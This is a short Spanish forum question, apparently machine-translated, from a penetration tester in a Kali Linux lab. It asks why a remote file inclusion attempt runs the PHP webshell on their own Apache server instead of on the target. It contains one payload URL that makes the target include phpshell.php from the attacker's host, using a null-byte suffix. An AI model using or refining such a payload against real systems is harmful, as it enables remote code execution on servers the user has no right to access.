Estoy usando Kali Linux en un laboratorio de análisis de pruebas.
Al ingresar la siguiente URL en el sistema de la víctima, puedo acceder a mi servidor apache (veo una respuesta de acceso de 200 en mis registros), pero el archivo php se reproduce en mi sistema y luego engendro un webshell por mi cuenta. caja:
https://10.0.0.1/section.php?page=http://10.0.0.2/phpshell.php%00
¿Cómo puedo "cambiar el enlace" en apache para evitar que se ejecute?
Cambiarlo a .txt
parece evitar que se ejecute en ambos sistemas; no estoy seguro de que pueda inyectarlo de esa manera .